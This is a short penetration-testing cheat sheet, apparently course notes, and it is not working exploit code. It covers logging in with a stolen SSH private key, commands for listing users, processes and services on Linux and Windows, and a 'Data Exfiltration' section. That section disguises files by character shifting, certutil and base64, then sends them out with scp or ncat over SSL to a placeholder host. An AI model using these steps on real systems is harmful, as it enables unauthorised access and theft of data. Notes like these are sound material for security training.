Bring private key to your own box
On your box:
chmod 600 /home/student/stolenkey
ssh -i /home/student/stolenkey jane@1.2.3.4

    *ssh as the user who is the original key owner*
------------------------------------------------------------------------------------------
User Enumeration:
    Linux:
cat /etc/hosts
cat /etc/passwd
sudo -l
ps -elf
chkconfig                   # SysV
systemctl --type=service    # SystemD

    Windows:
net user
tasklist /v
tasklist /svc
ipconfig /all
ip a
-------------------------------------------------------------------------------------------
Data Exfiltration:

Session Transcript:
 ssh <user>@<host> | tee

Obfuscation (Windows):
type <file> | %{$_ -replace 'a','b' -replace 'b','c' -replace 'c','d'} > translated.out
certutil -encode <file> encoded.b64

Obfuscation (Linux):
cat <file> | tr 'a-zA-Z0-9' 'b-zA-Z0-9a' > shifted.txt
cat <file>> | base64

Encrypted Transport:
scp <source> <destination>
ncat --ssl <ip> <port> < <file>

Extranet, Intranet, Internal



